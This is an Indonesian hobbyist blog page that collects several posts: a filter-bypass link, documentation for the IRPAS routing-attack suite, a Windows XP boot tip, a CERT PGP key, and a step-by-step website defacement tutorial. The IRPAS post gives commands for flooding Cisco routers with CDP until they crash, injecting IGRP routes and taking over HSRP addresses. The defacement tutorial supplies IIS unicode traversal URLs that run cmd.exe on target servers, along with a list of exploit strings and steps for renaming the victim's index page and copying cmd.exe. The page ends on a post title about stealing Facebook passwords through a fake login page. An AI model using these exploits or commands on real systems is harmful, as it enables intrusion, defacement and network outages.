. SouL of Reborn: Artikel dan berita

This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.This theme is Bloggerized by Lasantha Bandara - Premiumbloggertemplates.com.

Free counters!
Tampilkan postingan dengan label Artikel dan berita. Tampilkan semua postingan
Tampilkan postingan dengan label Artikel dan berita. Tampilkan semua postingan

Senin, 21 Oktober 2013

Cara membuka Situs yang di Block +Internet Positif

Cara membuka situs yang di block oleh Internet Positif tanpa harus menggunakan program/aplikasi yang ribet.

gambar diatas tidak akan muncul lagi pada browser anda
dengan mengklik gambar
di bawah ini dan tuliskan alamat situs yang tidak bisa anda akses
Selamat browsing tanpa batas
Click Here

Selasa, 19 Juli 2011

IRPAS (Internetwork Routing Protocol Attack Suite)

Introduction
IRPAS contains at the moment the following tools:
cdp
This program is for sending CDP (Cisco router Discovery Protocol) messages to the wire.
igrp
As the name suggests, this tool is for sending Interior Gateway Routing Protocol messages.
irdp
As the name suggests, this tool is for sending ICMP router discovery protocol messages.
irdpresponder
Waits for IRDP requests and sends out response packets to fool clients.
ass
ASS is a Autonomous System Scanner. Because routing protocols use autonomous systems to distinguish between various routing “domains” and various ways to communicate, you need something which works like a TCP port scanner but knows more then one protocol. This is ASS.
file2cable
sends out raw ethernet frames from files
itrace
traceroute(1) by ICMP echo request
tctrace
traceroute(1) by TCP SYN packets
netenum
enumeration / ping-sweep tool
netmask
ICMP netmask request
protos
IP protocol scanner
hsrp
HSRP takeover tool
These tools are not point-and-click. You should at least know, what you want to do with the particular protocol. So if you are not familiar with CDP, don´t try to use it.
CDP
CDP is a layer 2 protocol used by Cisco routers to discover each other on the same link (segment). This protocol is not routed and therefore this tool is just usefull in the local segment. CDP messages contain information about the sending Cisco router. These include the device ID (hostname), port ID (which port was the sender), the platform running on, the software incl. version, what the box is capable of and which network address (IP address) the interface has. If not configured otherwise, Cisco routers send these messages out every 30 seconds. In our case (ethernet), they are send to a special MAC address (01:00:0C:CC:CC:CC) and therefore are received from every Cisco router in the same segment. Other routers store the data and hold it for a time defined in the message (the tool uses the maximum of 255 seconds).
Very interesting is, that Cisco IOS uses the device ID as key to find out if the received message is an update and the neighbor is already known or not. If the device ID is to long, this test seems to fail and you constantly fill up the routers memory.
The CDP tool can be used in two different modi:
The flood mode is used to send garbage CDP messages to the wire, which has different effects to the routers depending on their IOS version. It is not tested very well, which version of IOS reacts in which way on which kind of Cisco hardware. So if you come across somthing, please report it. IOS 11.1(1) was tested and the router could match even long device id´s but rebooted after receiving three or four random device id names. Most other IOS versions just store the message and fill up the memory. When you try to debug CDP events, all IOS we tested crashed and reboot.
To use CDP, you have to specify the ethernet interface you will be working on: -i eth0
Everything else is optional.
-v     verbose
-n x   send x packets
-l x   length of the device id string. Keep in mind, that the
whole ethernet frame has to be smaller the 1514 bytes.
The maximum length is therefore 1480 for the device id
(default is 1400)
-c c   fills the device id with the char ‘c’
(default is ‘A’)
-r     makes the device id a random string of characters, which
leads to no matching on the receiver Cisco and to memory fillup
or crash
Example:
./cdp -i eth0 -n 10000 -l 1480 -r
Hint: if you want to flood the routers completly, start two processes of cdp with different sizes. One of them running on full size (1480) to fill up the major part of the memory and another to fill up the rest with a length of 10 octets.
The second mode for CDP is spoofing. You can enable this mode with the command line option -m 1. It has no actuall use for attacking router and is mostly targeted fro social engineering or just to confuse the local administrator. It is used to send out 100% valid CDP infromation packets which look like generated by other Cisco routers. Here, you can specify any part of a CDP message yourself.
-i <interface> ethernet interface
-v                     verbose
-D <string>            device id string
-P <string>            port id string
-L <string>            platform string
-S <string>            software string
-F <ip address>        ip address of the interface
-C <capabilities>      the capabilities of the device you are claiming to be:
R – Router, T – Trans Bridge, B – Source Route Bridge,
S – Switch, H – Host, I – IGMP, r – Repeater
Combine the letters to a string: RI means Router and IGMP
Example:
./cdp -v -i eth0 -m 1 -D ‘Hacker’ -P ‘Ethernet0′ -C RI \
-L ‘Intel’ -S “`uname -a`” -F ’255.255.255.255′
Which results on the cisco router in the following information:
cisco#sh cdp neig detail
————————-
Device ID: Hacker
Entry address(es):
IP address: 255.255.255.255
Platform: Intel,  Capabilities: Router IGMP
Interface: Ethernet0,  Port ID (outgoing port): Ethernet0
Holdtime : 238 sec
Version :
Linux attack 2.2.10 #10 Mon Feb 7 19:24:43 MET 2000 i686 unknown
IGRP
IGRP is a tool for route injection. The routing protocol IGRP is no longer really widely used in the outside world, but for the first steps, we decided to use this one as a starting point.
The whole purpose is to define a routing table with all possible parameters by hand without having your system actually running any kind of dynamic routing and sending this information out to the victim system(s). Since IGRP is a broadcast based protocol, the default behavior is to send these messages to the ip broadcast address (255.255.255.255). If you want to inject a route to a system remote from you, you have to address the ‘update’ accordingly and make sure that you send the packet(s) with the right source address, so the victim system accepts the update.
Before using the tool, you have to design your routing table you want to inject in the target router. It should contain data which makes your route the prefered one for the victim. The format is:
destination:delay:bandwith:mtu:reliability:load:hopcount
where destination is the network (192.168.1.0), delay is in ms/10, bandwith in MBit per second, MTU is the maximum transfer unit (1500 for ethernet), reliability and load are in percent (255=100%, 1=0%) and hopcount just in hops.
Empty lines and lines beginning with # are ignored.
Example:
# Routes file for igrp.c
#
# FX
# Phenoelit (http://www.phenoelit.de/)
#
# Format
# destination:delay:bandwith:mtu:reliability:load:hopcount
#
# Examples
222.222.222.0:500:1:1500:255:1:0
Usage: ./igrp -i <interface> -f <routes.file> -a <autonomous system> …
-i <interface>         interface
-v                             verbose
-f <routes file>               file, which contains the routes
(as much as you like)
-a <autonomous system> autonomous system the IGRP process is running
on, use ASS to find it out or specify a
range to use with -a START -b STOP to send
updates to all AS from START to STOP
(I highly recommend using ASS for this!!)
-S <spoofed source IP> maybe you need this
-D <destination IP>            If you don’t specify this, the broadcast
address is used
If you want the routes to be persistent (after some testing around), make up a shell loop and run the program within this loop every 25-30 seconds, to keep the victim beliving your routes.
ASS
ASS, the autonomous system scanner, is designed to find the AS of the router. It supports the following protocols: IRDP, IGRP, EIGRP, RIPv1, RIPv2, CDP, HSRP and OSPF.
In passive mode (./ass -i eth0), it just listens to routing protocol packets (like broadcast and multicast hellos).
In active mode (./ass -i eth0 -A), it tries to discover routers by asking for information. This is done to the appropriate address for each protocol (either broadcast or multicast addresses). If you specify a destination address, this will be used but may be not as effective as the defaults.
EIGRP scanning is done differently: While scanning, ASS listens for HELLO packets and then scans the AS directly on the router who advertised himself. You can force EIGRP scanning into the same AS-Scan behavior as IGRP uses by giving a destination or into multicast scanning by the option -M.
For Active mode, you can select the protocols you want to scan for. If you don’t select them, all are scanned. You select protcols by giving the option -P and any combination of the following chars: IER12, where:
I = IGRP
E = EIGRP
R = IRDP
1 = RIPv1
2 = RIPv2
Usage is trival:
./ass [-v[v[v]]] -i <interface> [-p] [-c] [-A] [-M] [-P IER12]
-a <autonomous system start> -b <autonomous system stop>
[-S <spoofed source IP>] [-D <destination ip>]
[-T <packets per delay>]
Where:
-i <interface>         interface
-v                             verbose
-A                             this sets the scanner into active mode
-P <protocols>         see above (usage: -P EIR12)
-M                             EIGRP systems are scanned using the multicast
address and not by HELLO enumeration and
direct query
-a <autonomous system> autonomous system to start from
-b <autonomous system> autonomous system to stop with
-S <spoofed source IP> maybe you need this
-D <destination IP>            If you don’t specify this, the appropriate
address per protocol is used
-p                             don’t run in promiscuous mode (bad idea)
-c                             terminate after scanning. This is not
recommened since answers may arrive later and
you could see some traffic that did not show
up during your scans
-T <packets per delay> packets how many packets should we wait some
miliseconds (-T 1 is the slowest scan
-T 100 begins to become unreliable)
I really suggest to use -v !
I’m not going to explain why you do not get answers from routers in the Internet. If you don´t know what the ‘network x.y.z.0′ statement for cisco means, forget that you know this program exists (sorry..)
ASS output might look a little strange, but has it’s meanings:
Routers are identified by the sender’s IP address of the packet. This may lead to several routers showing up as more then one since they used different sender interfaces. In the brackets, the protocols this router runs are shown.
Routing protocols are shown as one or more indented lines. First, there is the routing protocol name (like EIGRP), followed by the autonomous system number in brackets. Aligned to the right is the target network if applicable.
IGRP
IGRP routing info shows the target network and in brackets the following values: Delay, Bandwidth, MTU, Reliability, Load and Hopcount.
IRDP
The IRDP info is limmited to the announced gateway (router) and it’s preference
RIPv1
RIPv1 info just gives you the classified target network (remember RIPv1 network boundaries) and it’s metric
RIPv2
RIPv2 info contains after the target network the following infos: Netmask, next hop, arbitary tag, and the metric. An additional line may appear on the routers section that gives you the authentication if enabled in the protocol. For text auth, the password is there.
EIGRP basic
The basic EIGRP just gives you the autonomous system number, the IOS and EIGRP version as found in the HELLO packet
EIGRP routes
The EIGRP routes section depends on the type of route. All of them include the fields destination network, destination mask and in the last line (in brackets) the values for Delay, Bandwidth, MTU, Reliability, Load and Hopcount. External routes also include the originating router, the originating autonomous system, the external metric and the source of this route.
HSRP
HSRP info is not routing, therefore the third field is the virtual IP address of the standby group, followed by the state, the auth string, Hello, Hold and priority values.
OSPF
OSPF info includes the destination network as well as the Area in IP format, the authentication used (and, if applicable the auth string), netmask, designated and backup router and the values for Dead, Priority and Hello.
IRDP
This tool sends out IRDP responses. Nothing else Usage:
-i <interface>         interface
-p <preference>                preference of this entry, default is 0
-l <lifetime>          lifetime of the entry, default: 1800
-S <spoofed source IP> maybe you need this
-D <destination IP>            If you don’t specify this, the broadcast
address is used
IRDPresponder
Sniffer, which listens to IRDP requests (solicitation) and answers. Sends out periodic updates.
Usage:
-v                             verbose
-P                             enable promiscuous mode
-i <interface>         interface
-p <preference>                preference of this entry, default is 0
-l <lifetime>          lifetime of the entry, default: 1800
-S <spoofed source IP> maybe you need this
-D <destination IP>            If you don’t specify this, the
broadcast address is used
file2cable
This tool is perfect to find new vulnerabilities and test concepts. It sends out any binary file as Ethernet frame – AS IT IS. So make sure you know what you do. Hint: use xxd from the vim package to produce the binary file from hex dumps.
Usage:
-v             verbose (hex dump to screen)
-i <int>       interface
-f <file>      the file you want to send
itrace
Itrace is a program that implements traceroute(1) functionality using ICMP echo request packets. Therefore, it looks like you are just pinging your target while you traceroute there. It often helps tracing behind firewalls.
Usage: ./itrace -i eth0 -d www.phenoelit.de
-v             verbose
-n             reverse lookup answering IPs (slow!)
-p x           send x probes per hop (default=3)
-m x           set TTL max to x (default=30)
-t x           timout after x seconds (default=3)
-i interface   the normal eth0 stuff
-d destination Name or IP of destination
tctrace
TCtrace is like itrace a traceroute(1) brother – but it uses TCP SYN packets to trace. This makes it possible for you to trace through firewalls if you know one TCP service that is allowed to pass from the outside.
Usage: ./tctrace -i eth0 -d www.phenoelit.de
-v             verbose
-n             reverse lookup answering IPs (slow!)
-p x           send x probes per hop (default=3)
-m x           set TTL max to x (default=30)
-t x           timout after x seconds (default=3)
-D x           Destination port x (default=80)
-S x           Source port x (default=1064)
-i interface   the normal eth0 stuff
-d destination Name or IP of destination
netenum
netenum can be used to produce lists of hosts for other programs. It’s not as powerful as other ping-sweep tools, but it’s simple. When giving a timeout, it uses ICMP echo request to find available hosts. If you don’t supply a timeout, it just prints an IP address per line, so you can use them in shell scripts.
Usage: ./netenum 10.1.2.3/25
netenum <destination> [timout] [verbosity]
destination can be in the following formats:
dotted IP address:      10.1.1.1
IP and Netmask:         10.1.1.1/255.255.255.0
IP and “slashmask”:     10.1.1.1/24
Name:                   www.phenoelit.de
timeout applies for the whole operation!
verbosity is between 0 (quiet) to 3 (verbose)
An application would be a remote HSRP attack:
for i in `netenum 10.1.2.0/26`
do
./hsrp -d ${i} -v192.168.1.22 -a cisco -g 1 -i eth0
done
netmask
netmask asks for the netmask by ICMP.
Usage: ./netmask -d destination -t timeout
protos
Protos is a IP protocol scanner. It goes through all possible IP protocols and uses a negative scan to sort out unsupported protocols which should be reported by the target using ICMP protocol unreachable messages.
Usage: ./protos -i eth0 -d 10.1.2.3 -v
-v             verbose
-V             show which protocols are not supported
-u             don’t ping targets first
-s             make the scan slow (for very remote devices)
-L             show the long protocol name and it’s reference (RFC)
-p x           number of probes (default=5)
-S x           sleeptime is x (default=1)
-a x           continue scan afterwards for x seconds (default=3)
-d dest        destination (IP or IP/MASK)
-i interface   the eth0 stuff
-W             don’t scan, just print the protocol list
Normal output for a Windows host looks like this:
10.1.1.4 may be running (did not negate):
ICMP IGMP TCP UDP
While a cisco router supports more:
10.1.1.1 may be running (did not negate):
ICMP IPenc TCP IGP UDP GRE SWIPE MOBILE SUN-ND EIGRP IPIP
hsrp
HSRP protcol can be used to take over an HSRP standby IP or to force a switchover or to DoS this IP: Usage: ./hsrp -i eth0 -v 1.2.3.4 -d 224.0.0.2 -a cisco -g 1
-i int         the eth0 stuff
-v ip          the standby IP address
-d dest        the destination IP (multicast or directed)
-a auth        the password (default=”cisco”)
-g x           the standby group
-S source      spoofed source if desired
To take over the standby IP 10.1.1.1 from all HSRP routers to the VIPPR IP 10.1.1.66 use
while (true)
do
./hsrp -d 224.0.0.2 -v 10.1.1.1 -a cisco -g 1 -i eth0 -S 10.1.1.66
sleep 3
done
To force 10.1.1.2 into standby (and therefore having another HSRP router taking over) use
while (true)
do
./hsrp -d 10.1.1.2 -v 10.1.1.1 -a cisco -g 1 -i eth0
sleep 3
done
Since the others will not see these messages, you can force failovers all the way

Sabtu, 16 Juli 2011

Tips Mempercepat Booting Windows XP

Mungkin anda pernah mengalami booting windows yang sangat lambat
Berikut langkah-langkahnya agar booting windows anda menjadi lebih cepat :

Langkah 1 :
Buka aplikasi notepad
Ketikkan “del c:\windows\prefetch\ntosboot-*.*/q” (Tanpa tanda kutip )
dan save as dengan nama ntosboot.bat dalam drive c:\

Langkah 2 :
Lalu klik menu Start–>Run–> dan ketikkan gpedit.msc

Langkah 3 :
Klik Computer Configuration–>Windows Settings–>Script–>lalu klik 2 kali pada Shutdown

Langkah 4 :
Dalam Windows Shutdown Properties klik add lalu browse. lalu cari letak file ntosboot.bat yang anda buat tadi dan klik open

Langkah 5 :
Lalu klik OK ,Apply dan OK sekali lagi untuk menyelesaikannya

Langkah 6 :
Lalu klik menu Start–>Run–> dan devmgmt.msc

Langkah 7 :
Klik IDE ATA/ATAPI controllers–>Primary IDE Channel ( Klik 2 kali untuk membuka properties )

Langkah 8 :
Pilih Advanced Settings
Pada Device 0 atau Device 1
Ganti Device Type menjadi None ( Ganti saja pilihan Device Type yang tidak terkunci )

Langkah 9 :
Klik IDE ATA/ATAPI controllers–>Secondary IDE Channel ( Klik 2 kali untuk membuka properties )
Ulangi seperti Langkah 8

Langkah 10 :
Restart Komputer anda dan anda bisa lihat perubahannya.

Semoga Bermanfaat

Selasa, 12 April 2011

BEGIN PGP PUBLIC KEY BLOCK - GnuPG v1.4.5 (GNU/Linux)

-----BEGIN PGP PUBLIC KEY BLOCK-----
  Version: GnuPG v1.4.5 (GNU/Linux) 
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
mdAcpDQ=
=+taj
-----END PGP PUBLIC KEY BLOCK-----
 
This document is available from: http://www.cert.org/advisories/CA-1996-26.html
 

Langkah - Langkah Deface web

Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs. Tentu saja prosesnya dilakukan dengan memanfaatkan kelemahan dari situs tersebut, sehingga kalo loe adalah web master dan loe ngerubah tampilan halaman situs yang loe punya tentu saja
itu nggak bisa disebut deface...heheheh. Banyak yang bertanya "gimana sich nge-deface situs?" seperti yang telah gue sebutin diatas proses deface dilakukan dengan memanfaatkan lubang (hole) yang terdapat pada server tempat situs itu berada. Sehingga hal pertama yang harus kamu ketah
ui untuk melakukan proses deface adalah OS (Operating System) dari server situs tersebut. Hal ini karena karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS dengan BSD tentu saja sangat berbedaapabila kita ingin melakukan deface diantara kedua OS tsb. Operating
System atau OS biasanya kalo gue sich gue kelompikin ke 2 keluarga besar,yaitu :
1. IIS (server untuk microsoft, dkk)
2. Unix (linux,BSD,IRIX,SOLARIS,dsb)

Nah kita kelompikin jadi 2 gitu aja yah..:) sekarang saya coba jelaskan satu-satu. Dikarenakan sudah banyak tutorial yang membahas mengenai kelemahan dari IIS (baik IIS 4 maupun 5) maka disini gue cumancopy-paste tutorial yang pernah dibuat oleh salah satu "maha guru" dalam
komunitas #cracxer di DALNET, yah sapa lagi kalo bukan "pak-tani" (master..paLa loE lONjoNG..!!) heheheeh... ini dia tutorialnya :

~*~DEFACING NT WEB SERVER WITH BUG UNICODE MICROSOFT IIS~*~
--------------------------------------------------------------------------------------------

Melalui tutor ini saya teh hanya ingin berbagi pengalaman mengenai cara men-deface website yang
menggunakan Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR (sebutan bagi org yg suka deface..;p) ketahui...Microsoft Internet Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang dinamakan "unicode bug". Sayah tidak akan menjelaskan panjang lebar mengenai "unicode bug" ini karena sayah takut salah menjelaskan (ssSSTTtHHH!! jgn bilang sapa2 yah sebenernyah sayah teh emang gak tau ...ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi komputer target dengan hanya menggunakan internet browser.

OK...mari kita mulai...Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)...key nya terserah kowe.....Lalu utk mengetahui site itu menggunakan
MS IIS 4.0/5.0...Kita scan terlebih dahulu di www.netcraft.com......dapat site yah..??...Okeh..
setelah kita mendapatkan site yg menggunakan MS IIS 4.0/5.0 ...Langkah selanjutnya utk mengetahui site tersebut belum di-patch bug unicode nya mari kita scan site tersebut di mirc (utk mengeteahui cara scan lewat mirc....coba koe buka http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode Dengan MIRC),bisa juga memakai sopwer yg bisa and DL di http://accessftp.topcities.com/.... or memakai cara manual yg lebih sering sayah gunakan ehehhehehhee...contoh:

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\

Ada dua kemungkinan yang tampil pada browser Anda yaitu:
Kahiji : Muncul pesan ERROR ...
Kaduana : Muncul daftar file-file dari drive C pada komputer server target. Bila ini terjadi maka
www.targethost.com tadi ada kemungkinan untuk bisa kita deface...

Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL diatas menjadi empat bagian yaitu :
• Bagian host, yaitu "http://www.targethost.com"
• Bagian exploit string, yaitu "/scripts/..%255c..%255c"
• Bagian folder, yaitu "/winnt/system32/"
• Bagian command, yaitu "cmd.exe?/c+dir+c:\"


Kita lihat pada bagian command diatas menunjukkan perintah "dir c:\" yang berarti melihat seluruh
file-file yang berada pada root drive C. Koe bisa mencoba perintah yang lain seperti "dir d:\"
atau yang lain. Ingat, Koe harus mengganti karakter spasi dengan tanda "+". Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan perintah "ipconfig.exe /all"

Selain itu ada beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error pada
browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah, eksploit string yg sering
tembus adalah :
- /cgi-bin/..%255c..%255c
- /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af..
- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
- /scripts/..%255c..%255c

Jika semua pilihan eksploit string diatas masih memunculkan pesan error pada browser koe maka
kemungkinan besar IIS pada web server sudah di-patch bug unicode nya (OR IE kowe yg lagie dodolss ...hiheiehiehiehei). Dan koe bisa memilih situs lain sebagai sasaran....(yg sabar yah nak nyari targetnyah...ehehhehehe).

Lanjuttt......udeh dapet site yg bug unicodenyah gak di patch..??....Langkah berikutnya adalah
mengetahui di folder manakah diletakkan dokumen-dokumen web seperti default.htm/html/asp,,
index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada juga yg pake .php/php3/shtml.
Folder ini dinamakan web root. Biasanya web root berada di C:\InetPub\wwwroot\ atau
D:\InetPub\wwwroot. Tapi terkadang web administrator menggantinya dengan yang lain. Untuk mengetahuinya koe cukup mengetikkan URL seperti di bawah ini

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set

URL diatas akan menampilkan daftar environment variable dari web server sasaran. Kebuka..??...
Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau tulisan PATH_TRANSLATEDnyah...gak ada yahh ..??...coba deh koe ripresh lagehh...udah ketemuuu...nah skrg kita DIR deh tuh si PATH_TRANSLATED nyah.....Kita ambil contoh PATH_TRANSLATEDnyah : C:\InetPub\wwwroot....Perintahnya ng-DIR nyah :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot

Huaaaaaaa....isinyah banyak banged yahh.....mana dokumen2 web yg kita curigain itu ada 3 bijih
lagehh....hemm santeyy...oiyahh...lupa sayah...Tugas kita setelah ng-DIR PATH_TRANSLATEDnyah.....
truss kita cari dokumen web itu disitu utk kita RENAME....gemana kalo misalnyah dokumen2 web yg kita curigain itu ada 3..santeyy...coba skrg koe buka site aslinyah di laen window....
http://www.targethost.com == neh yg ini......di situ kan alias di
http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot
dokumen2
web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME....misalnya : di

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\InetPub\wwwroot itu ada :
Directory of C:\InetPub\wwwroot
07/20/01 03:21p 1,590 default.htm
07/20/01 03:21p 590 index.html
07/20/01 03:21p 3,453 main.html


Udah di buka kan site aslinyah...nah coba masukin salah satu dokumen web itu di site asli nyah...
contoh : http://www.targethost.com/default.htm kita liad hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh yg main.html ituu. perintahnya :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:\InetPub\wwwroot\main.html+gue.html

Lihat apa yg terjadi di IE kitaa

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
Access is denied

Yahhhh..akses dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh !!!Dapat
targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME seperti di bawah ini bukan??

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are :

Kalo iyahh.waaa selamat anda telah merubah or berhasil men-deface halaman depan web site
tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann ehehhehehhee
(Jgn lupa kita simpan C:\InetPub\wwwroot\main.html *file yg kita rename tadi di notepad utk
langkah selanjutnyah*)


Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..

Utk meng-upload file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada direktori
C:\winnt\system32 ke suatu folder lain atau folder yang sama dengan nama lain, misalnya cmdku.exe
. Untuk meng-copy cmd.exe menjadi cmdku.exe pada folder winnt\system32 maka cukup ketik URL
berikut :

http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\cmdku.exe

Mencuri Pasword Facebook Metode ( Fake Login Facebook) php

